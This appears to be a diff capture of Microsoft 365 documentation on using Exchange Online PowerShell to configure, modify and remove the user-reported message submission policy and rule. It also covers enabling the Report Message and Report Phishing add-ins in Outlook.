--- You can delete the report submission rule and recreate it with a different name, but the rule is always associated with the report submission policy, and you can't select or change the name of the policy. So, we recommend naming the rule DefaultReportSubmissionRule if you create or recreate the rule.--- When you specify the email address of the reporting mailbox in the Microsoft Defender portal, that value is primarily set in the report submission rule, but the value is also copied into the related properties in the report submission policy. In PowerShell, when you set the email address in the rule, the value isn't copied into the related properties in the policy. For consistency with the **User reported settings** page and for clarity, we recommend that you add or update the email address in the policy and the rule.-
-### Use PowerShell to view the report submission policy and the report submission rule
-
-To view the report submission policy, run the following command in Exchange Online PowerShell:
-
-```powershell
-Get-ReportSubmissionPolicy
-```
-
-To view the report submission rule, run the following command:
-
-```powershell
-Get-ReportSubmissionRule
-```
-
-To view both the policy and the rule at the same time, run the following commands:
-
-```powershell
-Write-Output -InputObject `r`n,"Report Submission Policy",("-"*79); Get-ReportSubmissionPolicy; Write-Output -InputObject `r`n,"Report Submission Rule",("-"*79); Get-ReportSubmissionRule
-```
-
-Remember, the report submission policy doesn't exist if any of the following statements are true:
--- No one ever opened the **User reported settings** page at <https://security.microsoft.com/securitysettings/userSubmission>.-- No one ever manually created the report submission policy in PowerShell.-- Someone manually deleted the report submission policy in PowerShell.-
-Likewise, the report submission rule doesn't exist if either of the following statements are true:
--- No one ever specified a reporting mailbox on the **User reported settings** page (but remember, the global admin's Exchange Online mailbox is used by default).-- No one ever manually created the report submission rule in PowerShell.-- Someone manually deleted the report submission rule in PowerShell.-
-So, it's possible that the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets return nothing.
-
-For detailed syntax and parameter information, see [Get-ReportSubmissionPolicy](/powershell/module/exchange/get-reportsubmissionpolicy) and [Get-ReportSubmissionRule](/powershell/module/exchange/get-reportsubmissionrule).
-
-### Use PowerShell to create the report submission policy and the report submission rule
-
-If the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets return no output, you can create the report submission policy and the report submission rule. If you try to create them after they already exist, you get an error.
-
-Always create the report submission policy first, because you specify the report submission policy in the report submission rule.
-
-For detailed syntax and parameter information, see [New-ReportSubmissionPolicy](/powershell/module/exchange/new-reportsubmissionpolicy) and [New-ReportSubmissionRule](/powershell/module/exchange/new-reportsubmissionrule).
-
-#### Use PowerShell to configure reporting in Outlook with report messages to Microsoft and the reporting mailbox
-
-This example creates the report submission policy with the default settings:
--- Reporting in Outlook is turned on: `-EnableThirdPartyAddress $false` is the default value, so you don't need to use the parameter to get:
- - **Outlook** section: **Monitor reported messages in Outlook** selected.
- - **Select an Outlook report button configuration** section: **Use the built-in Report button in Outlook** selected.
--- **Reported message destinations** section:
- - **Send reported messages to**: **Microsoft and my reporting mailbox** is selected: `-EnableReportToMicrosoft $true`, `-ReportJunkToCustomizedAddress $true`, `-ReportNotJunkToCustomizedAddress $true`, and `-ReportPhishToCustomizedAddress $true` are the default values, so you don't need to use those parameters.
-
- To populate **Add an Exchange Online mailbox to send reported messages to** with the email address of the reporting mailbox, use the following cmdlets and parameters:
-
- - **New-ReportSubmissionPolicy**: `-ReportJunkAddresses <emailaddress>`, `-ReportNotJunkAddresses <emailaddress>`, and `-ReportPhishAddresses <emailaddress>`.
- - **New-ReportSubmissionRule**: `-SentTo <emailaddress>`.
-
- > [!NOTE]
- > The default value of the parameters that identify the reporting mailbox is blank, which means the default reporting mailbox is the global admin's Exchange Online mailbox. The global admin isn't _shown_ as the reporting mailbox in the output of the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets or on the **User reported settings** page in the Defender portal until _after_ the first user in the organization reports a message from Outlook.
- >
- > Use the same email address value in all parameters that identify the reporting mailbox.
-
-Other settings:
--- **Outlook** section \> **Select an Outlook report button configuration** section:
- - ***When the user reports an email** section:
- - **Ask the user to confirm before reporting**:
- - When you go to the **User reported settings** page in the Defender portal for the first time (which creates the report submission policy), this setting is not selected (equivalent to `-PreSubmitMessageEnabled -$false`).
- - When you use PowerShell to create the policy, the default value is `-PreSubmitMessageEnabled $true`.
-
- So, to use PowerShell to recreate the default settings, you need to use `-PreSubmitMessageEnabled $false`.
-
- - **Show a success message after the message is reported**:
- - When you go to the **User reported settings** page in the Defender portal for the first time (which creates the report submission policy), this setting is not selected (equivalent to `-PostSubmitMessageEnabled -$false`).
- - When you use PowerShell to create the policy, the default value is `-PostSubmitMessageEnabled $true`.
-
- So, to use PowerShell to recreate the default settings, you need to use `-PostSubmitMessageEnabled $false`.
-
- - **Customize messages**: Nothing is customized (`-EnableCustomizedMsg $false` is the default value).
-
- The syntax to enter customized values for up to 7 different languages with the line split for clarity is:
-
- ```powershell
- -PreSubmitMessageEnabled $true -MultiLanguageSetting LanguageCode1,LanguageCode2...LanguageCode7 `
- -MultiLanguagePreSubmitMessageTitleForPhishing "Language1 Before Phishing Title Text","Language2 Before Phishing Title Text",..."Language7 Before Phishing Title Text" `
- -MultiLanguagePreSubmitMessageForPhishing "Language1 Before Phishing Description Text","Language2 Before Phishing Description Text",..."Language7 Before Phishing Description Text" `
- [-MultiLanguagePreSubmitMessageButtonTextForPhishing "Language1 Before Phishing Info Button Text","Language2 Before Phishing Info Button Text",..."Language7 Before Phishing Info Button Text"] `
- [-MultiLanguagePreSubmitMessageButtonLinkForPhishing "Language1 Before Phishing Info Button URL","Language2 Before Phishing Info Button URL",..."Language7 Before Phishing Info Button URL"] `
- -MultiLanguagePreSubmitMessageTitleForJunk "Language1 Before Junk Title Text","Language2 Before Junk Title Text",..."Language7 Before Junk Title Text" `
- -MultiLanguagePreSubmitMessageForJunk "Language1 Before Junk Description Text","Language2 Before Junk Description Text",..."Language7 Before Junk Description Text" `
- [-MultiLanguagePreSubmitMessageButtonTextForJunk "Language1 Before Junk Info Button Text","Language2 Before Junk Info Button Text",..."Language7 Before Junk Info Button Text"] `
- [-MultiLanguagePreSubmitMessageButtonLinkForJunk "Language1 Before Junk Info Button URL","Language2 Before Junk Info Button URL",..."Language7 Before Junk Info Button URL"]
- -MultiLanguagePreSubmitMessageTitleForNotJunk "Language1 Before Not Junk Title Text","Language2 Before Not Junk Title Text",..."Language7 Before Not Junk Title Text" `
- -MultiLanguagePreSubmitMessageForNotJunk "Language1 Before Not Junk Description Text","Language2 Before Not Junk Description Text",..."Language7 Before Not Junk Description Text" `
- [-MultiLanguagePreSubmitMessageButtonTextForNotJunk "Language1 Before Not Junk Info Button Text","Language2 Before Not Junk Info Button Text",..."Language7 Before Not Junk Info Button Text"] `
- [-MultiLanguagePreSubmitMessageButtonLinkForNotJunk "Language1 Before Not Junk Info Button URL","Language2 Before Not Junk Info Button URL",..."Language7 Before Not Junk Info Button URL"] `
- -MultiLanguagePostSubmitMessageTitleForPhishing "Language1 After Phishing Title Text","Language2 After Phishing Title Text",..."Language7 After Phishing Title Text" `
- -MultiLanguagePostSubmitMessageForPhishing "Language1 After Phishing Description Text","Language2 After Phishing Description Text",..."Language7 After Phishing Description Text" `
- [-MultiLanguagePostSubmitMessageButtonTextForPhishing "Language1 After Phishing Info Button Text","Language2 After Phishing Info Button Text",..."Language7 After Phishing Info Button Text"] `
- [-MultiLanguagePostSubmitMessageButtonLinkForPhishing "Language1 After Phishing Info Button URL","Language2 After Phishing Info Button URL",..."Language7 After Phishing Info Button URL"] `
- -MultiLanguagePostSubmitMessageTitleForJunk "Language1 After Not Junk Title Text","Language2 After Not Junk Title Text",..."Language7 After Not Junk Title Text" `
- -MultiLanguagePostSubmitMessageForJunk "Language1 After Not Junk Description Text","Language2 After Not Junk Description Text",..."Language7 After Not Junk Description Text" `
- [-MultiLanguagePostSubmitMessageButtonTextForJunk "Language1 After Not Junk Info Button Text","Language2 After Not Junk Info Button Text",..."Language7 After Not Junk Info Button Text"] `
- [-MultiLanguagePostSubmitMessageButtonLinkForJunk "Language1 After Not Junk Info Button URL","Language2 After Not Junk Info Button URL",..."Language7 After Not Junk Info Button URL"]
- ```
-
- - For valid language codes, see [New-ReportSubmissionPolicy](/powershell/module/exchange/new-reportsubmissionpolicy#-multilanguagesetting).
- - The order that you enter the language codes doesn't matter, but you must use the same order for the corresponding _MultiLanguagePre\*_ and _MultiLanguagePost\*_ parameter values.
- - A text value for each language is required in the _MultiLanguage\*SubmitMessageTitleFor\*_ and _MultiLanguage\*SubmitMessageFor\*_ parameters (for example, _MultiLanguagePreSubmitMessageTitleForPhishing_ and _MultiLanguagePreSubmitMessageForPhishing_). The corresponding _MultiLanguage\*SubmitMessageButtonTextFor\*_ and _MultiLanguage\*SubmitMessageButtonLinkFor\*_ are optional, but you must use them both together.
- - For the number of language codes that you specify, you need to provide the same number of blank values for **all** of the _MultiLanguage\*SubmitMessage\*_ parameters that you aren't using. For example, if you're using three languages, but you aren't using the _MultiLanguagePostSubmitMessageButtonTextForJunk_ and _MultiLanguagePostSubmitMessageButtonLinkForJunk_ parameters, you need to use the value `"","",""` for those parameters. You might need to add these blank values for up to 18 of the _MultiLanguage\*SubmitMessage\*_ parameters.
-
- > [!NOTE]
- > Customized pre-reporting and post-reporting pop-ups are shown when using the **Report** button in Outlook on the web.
- >
- > The Microsoft Report Message add-in supports only customized **Title** and **Description** values, and only for pre-reporting pop-ups (**Report phishing**, **Report junk**, and **Report not junk**).
- >
- > The Microsoft Report Phishing add-in supports all customized values, but only for the **Report phishing** pre-reporting pop-up.
--- **Email notifications** section:
- - **Results email** section:
- - **Customize results email**: Nothing is entered in the **Email body results text** or **Email footer text** boxes on the **Phishing**, **Junk**, or **No threats found** tabs in the flyout (`-EnableCustomizedMsg $false` is the default value).
- - **Automatically email users the results of the investigation.**
- - **Customize sender and branding** section:
- - **Specify a Microsoft 365 mailbox to use as the From address of email notifications** isn't selected (`-EnableCustomNotificationSender $false` is the default value).
- - **Replace the Microsoft logo with my organization's logo across all reporting experiences** isn't selected (`-EnableOrganizationBranding $false` is the default value).
--- **Reporting from quarantine** section: **Allow reporting for quarantined messages** is selected (`-DisableQuarantineReportingOption $false` is the default value).-
-In this example, the email address of the reporting mailbox is reportedmessages@contoso.com in Exchange Online (you can't specify an external email address).
-
-```powershell
-$usersub = "reportedmessages@contoso.com"
-
-New-ReportSubmissionPolicy -ReportJunkAddresses $usersub -ReportNotJunkAddresses $usersub -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false
-
-New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
-```
-
-#### Use PowerShell to configure reporting in Outlook with report messages to the reporting mailbox only
-
-This example creates the report submission policy and the report submission rule with the following settings:
--- Reporting in Outlook is turned on: `-EnableThirdPartyAddress $false` is the default value, so you don't need to use the parameter to get:
- - **Outlook** section: **Monitor reported messages in Outlook** selected.
- - **Select an Outlook report button configuration** section: **Use the built-in Report button in Outlook** selected.
--- **Reported message destinations** section:
- - **Send reported messages to** \> **My reporting mailbox only**: `-EnableReportToMicrosoft $false` and `-EnableUserEmailNotification $true` are required. `-ReportJunkToCustomizedAddress $true`, `-ReportNotJunkToCustomizedAddress $true`, and `-ReportPhishToCustomizedAddress $true` are the default values, so you don't need to use those parameters.
-
- To populate **Add an Exchange Online mailbox to send reported messages to** with the email address of the reporting mailbox, use the following cmdlets and parameters:
-
- - **New-ReportSubmissionPolicy**: `-ReportJunkAddresses <emailaddress>`, `-ReportNotJunkAddresses <emailaddress>`, and `-ReportPhishAddresses <emailaddress>`.
- - **New-ReportSubmissionRule**: `-SentTo <emailaddress>`.
-
- > [!TIP]
- > The default value of the parameters that identify the reporting mailbox is blank, which means the default reporting mailbox is the global admin's Exchange Online mailbox. The global admin isn't _shown_ as the reporting mailbox in the output of the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets until _after_ the first user in the organization reports a message from Outlook.
- >
- > Use the same email address value in all parameters that identify the reporting mailbox.
-
-The remaining settings are the default values in "Other settings" as described in the [Use PowerShell to configure reporting in Outlook with report messages to Microsoft and the reporting mailbox](#use-powershell-to-configure-reporting-in-outlook-with-report-messages-to-microsoft-and-the-reporting-mailbox) section.
-
-In this example, the email address of the reporting mailbox is userreportedmessages@fabrikam.com in Exchange Online (you can't specify an external email address).
-
-> [!TIP]
-> The value `-ReportChatMessageEnabled $false` is required to achieve **Send reported messages to** \> **My reporting mailbox only**. Even when the _ReportChatMessageEnabled_ property value is `$false` in PowerShell, the **Monitor reported message in Microsoft Teams** settings on the **User reported settings** page is selected. Selecting or unselecting **Monitor reported message in Microsoft Teams** on the **User reported settings** page doesn't change the value of the _ReportChatMessageEnabled_ property in PowerShell.
-
-```powershell
-$usersub = "userreportedmessages@fabrikam.com"
-
-New-ReportSubmissionPolicy -EnableReportToMicrosoft $false -EnableUserEmailNotification $true -ReportJunkAddresses $usersub -ReportNotJunkAddresses $usersub -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -ReportChatMessageEnabled $false
-
-New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
-```
-
-#### Use PowerShell to configure reporting in Outlook with report messages to Microsoft only
-
-This example creates the report submission policy with the following settings:
--- Reporting in Outlook is turned on: `-EnableThirdPartyAddress $false` is the default value, so you don't need to use the parameter to get:
- - **Outlook** section: **Monitor reported messages in Outlook** selected.
- - **Select an Outlook report button configuration** section: **Use the built-in Report button in Outlook** selected.
--- **Reported message destinations** section:
- - **Send reported messages to** \> **Microsoft only**: `-EnableReportToMicrosoft $true` is the default value, so you don't need to use the parameter. `-ReportJunkToCustomizedAddress $false`, `-ReportNotJunkToCustomizedAddress $false`, and `-ReportPhishToCustomizedAddress $false` are required.
-
- > [!TIP]
- > The default value of the parameters that identify the reporting mailbox is blank, which means the default reporting mailbox is the global admin's Exchange Online mailbox. The global admin isn't _shown_ as the reporting mailbox in the output of the **Get-ReportSubmissionPolicy** and **Get-ReportSubmissionRule** cmdlets until _after_ the first user in the organization reports a message from Outlook.
-
-The remaining settings are the default values in "Other settings" as described in the [Use PowerShell to configure reporting in Outlook with report messages to Microsoft and the reporting mailbox](#use-powershell-to-configure-reporting-in-outlook-with-report-messages-to-microsoft-and-the-reporting-mailbox) section.
-
-> [!TIP]
-> The value `-ReportChatMessageEnabled $false` is required to achieve **Send reported messages to** \> **Microsoft only**. Even when the _ReportChatMessageEnabled_ property value is `$false` in PowerShell, the **Monitor reported message in Microsoft Teams** setting on the **User reported settings** page is selected. Selecting or unselecting **Monitor reported message in Microsoft Teams** on the **User reported settings** page doesn't change the value of the _ReportChatMessageEnabled_ property in PowerShell.
->
-> The values `-EnableUserEmailNotification $true` and `-ReportChatMessageToCustomizedAddressEnabled $false` are required to achieve **Send reported messages to** \> **Microsoft only**.
-
-```powershell
-New-ReportSubmissionPolicy -ReportJunkToCustomizedAddress $false -ReportNotJunkToCustomizedAddress $false -ReportPhishToCustomizedAddress $false -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -EnableUserEmailNotification $true -ReportChatMessageToCustomizedAddressEnabled $false -ReportChatMessageEnabled $false
-```
-
-Because a reporting mailbox isn't used, the report submission rule isn't needed or created.
-
-#### Use PowerShell to configure reporting in Outlook to use third-party reporting tools
-
-This example creates the report submission policy and the report submission rule with the following settings:
--- Reporting in Outlook is turned on:
- - **Outlook** section: **Monitor reported messages in Outlook** is selected.
- - **Select an Outlook report button configuration** section: **Use a non-Microsoft add-in button** is selected (`-EnableThirdPartyAddress $true` is required).
--- **Reported message destinations** section:
- - **Send reported messages to** \> **My reporting mailbox only**: `-EnableReportToMicrosoft $false`, `-EnableUserEmailNotification $true`, `-ReportJunkToCustomizedAddress $false`, `-ReportNotJunkToCustomizedAddress $false`, and `-ReportPhishToCustomizedAddress $false` are required.
-
- To populate **Add an Exchange Online mailbox to send reported messages to** with the email address of the reporting mailbox, use the following cmdlets and parameters:
-
- - **New-ReportSubmissionPolicy**: `-ThirdPartyReportAddresses <emailaddress>`, `-ReportJunkAddresses <emailaddress>`, `-ReportNotJunkAddresses <emailaddress>`, and `-ReportPhishAddresses <emailaddress>` are required.
- - **New-ReportSubmissionRule**: `-SentTo <emailaddress>` is required.
-
- > [!TIP]
- > Use the same email address value in all parameters that identify the reporting mailbox.
-
-The remaining settings are the default values in "Other settings" as described in the [Use PowerShell to configure reporting in Outlook with report messages to Microsoft and the reporting mailbox](#use-powershell-to-configure-reporting-in-outlook-with-report-messages-to-microsoft-and-the-reporting-mailbox) section.
-
-In this example, the email address of the reporting mailbox is thirdpartyreporting@wingtiptoys.com in Exchange Online (you can't specify an external email address).
-
-```powershell
-$usersub = "thirdpartyreporting@wingtiptoys.com"
-
-New-ReportSubmissionPolicy -EnableThirdPartyAddress $true -EnableReportToMicrosoft $false -EnableUserEmailNotification $true -ThirdPartyReportAddresses $usersub -ReportJunkAddresses $usersub -ReportNotJunkAddresses $usersub -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false
-
-New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
-```
-
-#### Use PowerShell to turn off reporting in Outlook
-
-Turning off reporting in Outlook has the following consequences:
--- The **Report** button in Outlook on the web and the Microsoft Report Message and Report Phishing add-ins are unavailable in all Outlook platforms.-- Third-party reporting tools still work, but reported messages don't appear on the **User reported** tab on the **Submissions** page in the Defender portal.-- **Allow reporting for quarantined messages** (_DisableQuarantineReportingOption_) is unaffected, and can be enabled or disabled when reporting in Outlook is turned off.-
-This example creates the report submission policy with reporting in Outlook turned off (**Outlook** section \> **Monitor reported messages in Outlook** not selected): `-EnableThirdPartyAddress $false` is the default value, so you don't need to use the parameter. `-EnableReportToMicrosoft $false`, `-EnableThirdPartyAddress $false, -ReportJunkToCustomizedAddress $false, -ReportNotJunkToCustomizedAddress $false, and -ReportPhishToCustomizedAddress $false` are required.
-
-> [!TIP]
-> The values `-PreSubmitMessageEnabled $true` and `-PostSubmitMessageEnabled $true` are required to achieve **Monitor reported messages in Outlook** not selected.
-
-```powershell
-New-ReportSubmissionPolicy -EnableReportToMicrosoft $false -ReportJunkToCustomizedAddress $false -ReportNotJunkToCustomizedAddress $false -ReportPhishToCustomizedAddress $false -PreSubmitMessageEnabled $true -PostSubmitMessageEnabled $true
-```
-
-Because a reporting mailbox isn't used, the report submission rule isn't needed or created.
-
-### Use PowerShell to modify the report submission policy and the report submission rule
-
-The same settings are available when you modify the report submission policy in PowerShell as when you created the policy as described in [the previous section](#use-powershell-to-create-the-report-submission-policy-and-the-report-submission-rule).
-
-When you modify the existing settings in the report submission policy, you might need to undo or nullify other settings that might or might not be configured. And, you might need to create or delete the report submission rule to allow or prevent message reporting to a reporting mailbox.
-
-For detailed syntax and parameter information, see [Set-ReportSubmissionPolicy](/powershell/module/exchange/set-reportsubmissionpolicy).
-
-The following examples show how to change the user reporting experience without concern for the existing settings or values:
--- Turn on reporting in Outlook if necessary, select **Use the built-in Report button in Outlook**, and change **Send reported messages to** to **Microsoft and my reporting mailbox*** with reportedmessages@contoso.com as the reporting mailbox:-
- ```powershell
- $usersub = "reportedmessages@contoso.com"
-
- Set-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy -EnableReportToMicrosoft $true -EnableThirdPartyAddress $false -ThirdPartyReportAddresses $null -ReportJunkToCustomizedAddress $true -ReportJunkAddresses $usersub -ReportNotJunkToCustomizedAddress $true -ReportNotJunkAddresses $usersub -ReportPhishToCustomizedAddress $true -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -ReportChatMessageEnabled $true
- ```
-
- And then run one of the following commands, depending on the existing configuration:
-
- - If the report submission rule already exists:
-
- ```powershell
- Set-ReportSubmissionRule -Identity DefaultReportSubmissionRule -SentTo $usersub
- ```
-
- - If the report submission rule doesn't exist:
-
- ```powershell
- New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
- ```
--- Turn on reporting in Outlook if necessary, select **Use the built-in Report button in Outlook**, and change **Send reported messages to** to **My reporting mailbox only** with userreportedmessages@fabrikam.com as the reporting mailbox:-
- ```powershell
- $usersub = "userreportedmessages@fabrikam.com"
-
- Set-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy -EnableReportToMicrosoft $false -EnableThirdPartyAddress $false -ThirdPartyReportAddresses $null -ReportJunkToCustomizedAddress $true -ReportJunkAddresses $usersub -ReportNotJunkToCustomizedAddress $true -ReportNotJunkAddresses $usersub -ReportPhishToCustomizedAddress $true -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -ReportChatMessageEnabled $false
- ```
-
- And then run one of the following commands, depending on the existing configuration:
-
- - If the report submission rule already exists:
-
- ```powershell
- Set-ReportSubmissionRule -Identity DefaultReportSubmissionRule -SentTo $usersub
- ```
-
- - If the report submission rule doesn't exist:
-
- ```powershell
- New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
- ```
--- Turn on reporting in Outlook if necessary, select **Use the built-in Report button in Outlook**, and change **Send reported messages to** to **Microsoft only**:-
- ```powershell
- Set-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy -EnableReportToMicrosoft $true -EnableThirdPartyAddress $false -ThirdPartyReportAddresses $null -ReportJunkToCustomizedAddress $false -ReportJunkAddresses $null -ReportNotJunkToCustomizedAddress $false -ReportNotJunkAddresses $null -ReportPhishToCustomizedAddress $false -ReportPhishAddresses $null -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -EnableUserEmailNotification $true -ReportChatMessageToCustomizedAddressEnabled $false -ReportChatMessageEnabled $false
- ```
-
- The following command is required only if the report submission rule already exists:
-
- ```powershell
- Get-ReportSubmissionRule | Remove-ReportSubmissionRule
- ```
--- Turn on reporting in Outlook if necessary, select **Use a non-Microsoft add-in button**, and use thirdpartyreporting@wingtiptoys.com as the reporting mailbox:-
- ```powershell
- $usersub = "thirdpartyreporting@wingtiptoys.com"
-
- Set-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy -EnableReportToMicrosoft $false -EnableThirdPartyAddress $true -ThirdPartyReportAddresses $usersub -ReportJunkToCustomizedAddress $true -ReportJunkAddresses $usersub -ReportNotJunkToCustomizedAddress $true -ReportNotJunkAddresses $usersub -ReportPhishToCustomizedAddress $true -ReportPhishAddresses $usersub -PreSubmitMessageEnabled $false -PostSubmitMessageEnabled $false -ReportChatMessageEnabled $true
- ```
-
- And then run one of the following commands, depending on the existing configuration:
-
- - If the report submission rule already exists:
-
- ```powershell
- Set-ReportSubmissionRule -Identity DefaultReportSubmissionRule -SentTo $usersub
- ```
-
- - If the report submission rule doesn't exist:
-
- ```powershell
- New-ReportSubmissionRule -Name DefaultReportSubmissionRule -ReportSubmissionPolicy DefaultReportSubmissionPolicy -SentTo $usersub
- ```
--- Turn off reporting in Outlook (**Monitor reported messages in Outlook** isn't selected):-
- ```powershell
- Set-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy -EnableReportToMicrosoft $false -EnableThirdPartyAddress $false -ThirdPartyReportAddresses $null -ReportJunkToCustomizedAddress $false -ReportJunkAddresses $null -ReportNotJunkToCustomizedAddress $false -ReportNotJunkAddresses $null -ReportPhishToCustomizedAddress $false -ReportPhishAddresses $null -PreSubmitMessageEnabled $true -PostSubmitMessageEnabled $true
- ```
-
- And then run the following command if the report submission rule already exists:
-
- ```powershell
- Get-ReportSubmissionRule | Remove-ReportSubmissionRule
- ```
-
-The only meaningful setting that you can modify in the report submission rule is the email address of the reporting mailbox (the _SentTo_ parameter value). For example:
-
-```powershell
-Set-ReportSubmissionRule -Identity DefaultReportSubmissionRule -SentTo newemailaddress@contoso.com
-```
-
-> [!NOTE]
-> If you change the email address of the reporting mailbox in the report submission rule, be sure to change the corresponding values in the report submissions policy. For example:
->
-> - _ThirdPartyReportAddresses_
-> - _ReportJunkAddresses_, _ReportNotJunkAddresses_, and _ReportPhishAddresses_
-
-For detailed syntax and parameter information, see [Set-ReportSubmissionRule](/powershell/module/exchange/set-reportsubmissionrule).
-
-To temporarily disable sending email messages to the reporting mailbox without deleting the report submission rule, use [Disable-ReportSubmissionRule](/powershell/module/exchange/disable-reportsubmissionrule). For example:
-
-```powershell
-Get-ReportSubmissionRule | Disable-ReportSubmissionRule -Confirm:$false
-```
-
-To enable the report submission rule, use [Enable-ReportSubmissionRule](/powershell/module/exchange/enable-reportsubmissionrule). For example:
-
-```powershell
-Get-ReportSubmissionRule | Disable-ReportSubmissionRule -Confirm:$false
-```
-
-### Use PowerShell to remove the report submission policy and the report submission rule
-
-To start over with the default settings of the report submission policy, you can delete it and recreate it. Removing the report submission policy doesn't remove the report submission rule, and vice-versa.
-
-To remove the report submission policy, run the following command in Exchange Online PowerShell:
-
-```powershell
-Remove-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy
-```
-
-To remove the report submission rule, run the following command:
-
-```powershell
-Get-ReportSubmissionRule | Remove-ReportSubmissionRule
-```
-
-To remove both the report submission policy and report submission rule in the same command without a confirmation, run the following command:
-
-```powershell
-Remove-ReportSubmissionPolicy -Identity DefaultReportSubmissionPolicy; Get-ReportSubmissionRule | Remove-ReportSubmissionRule -Confirm:$false
-```
-
-For detailed syntax and parameter information, see [Remove-ReportSubmissionPolicy](/powershell/module/exchange/remove-reportsubmissionpolicy) and [Remove-ReportSubmissionRule](/powershell/module/exchange/remove-reportsubmissionrule).
security Submissions Users Report Message Add In Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-users-report-message-add-in-configure.md
- Title: Enable the Report Message or the Report Phishing add-ins
- - NOCSH
----- Previously updated : 8/7/2023
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-description: Learn how to enable the Report Message or the Report Phishing add-ins for Outlook and Outlook on the web, for individual users, or for your entire organization.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Enable the Microsoft Report Message or the Report Phishing add-ins
--
-> [!NOTE]
-> If you're an admin in a Microsoft 365 organization with Exchange Online mailboxes, we recommend that you use the **Submissions** page in the Microsoft Defender portal. For more information, see [Use Admin Submission to submit suspected spam, phish, URLs, and files to Microsoft](submissions-admin.md).
-
-The Microsoft Report Message and Report Phishing add-ins for Outlook and Outlook on the web (formerly known as Outlook Web App or OWA) makes it easy for users to report false positives and false negatives to Microsoft for analysis. False positives are good email that was blocked or sent to the Junk Email folder. False negatives are unwanted email or phishing that was delivered to the Inbox.
-
-Microsoft uses these user-reported messages to improve the effectiveness of email protection technologies. For example, suppose that people are reporting many messages using the Report Phishing add-in. This information surfaces in the Security Dashboard and other reports. Your organization's security team can use this information as an indication that anti-phishing policies might need to be updated.
-
-The Report Message add-in provides the option to report both spam and phishing messages. The Report Phishing add-in provides the option to report phishing messages only.
-
-Admins can install and enable the add-ins for the organization. Both add-ins are available through [Centralized Deployment](../../admin/manage/centralized-deployment-of-add-ins.md). Individual users can install the add-ins for themselves.
-
-After the add-in is installed and enabled, users see the following icons based on their Outlook client:
--- **Outlook for Windows**:-
- - <u>The **Report Message** icon in the Classic Ribbon</u>:
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessageIcon.png" alt-text="The Report Message add-in using the Classic Ribbon in Outlook." lightbox="../../media/OutlookReportMessageIcon.png":::
-
- - <u>The **Report Message** icon in the Simplified Ribbon</u>: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More commands** \> **Report Message** in the **Protection** section.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OutlookReportMessage-simplified.png" alt-text="The Report Message add-in using the Simplified Ribbon in Outlook." lightbox="../../media/OutlookReportMessage-simplified.png":::
-
- - <u>The **Report Phishing** icon in the Classic Ribbon</u>:
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/Outlook-ReportPhishing.png" alt-text="The Report Phishing add-in in Outlook." lightbox="../../media/Outlook-ReportPhishing.png":::
-
- - <u>The **Report Phishing** icon in the Simplified Ribbon</u>: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More commands** \> **Report phishing** in the **Protection** section.
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/Outlook-ReportPhishing-simplified.png" alt-text="The Report Phishing add-in using the Simplified Ribbon in Outlook." lightbox="../../media/Outlook-ReportPhishing-simplified.png":::
--- **Outlook on the web**:-
- - <u>The Report Message add-in</u>:
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/owa-report-message-icon.png" alt-text="The Report Message add-in icon in Outlook on the web." lightbox="../../media/owa-report-message-icon.png":::
-
- - <u>The Report Phishing add-in</u>:
-
- > [!div class="mx-imgBorder"]
- > :::image type="content" source="../../media/OWA-ReportPhishing.png" alt-text="The Report Phishing add-in icon in Outlook on the web." lightbox="../../media/OWA-ReportPhishing.png":::
-
-## What do you need to know before you begin?
--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](../defender/manage-rbac.md) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Read-only**.
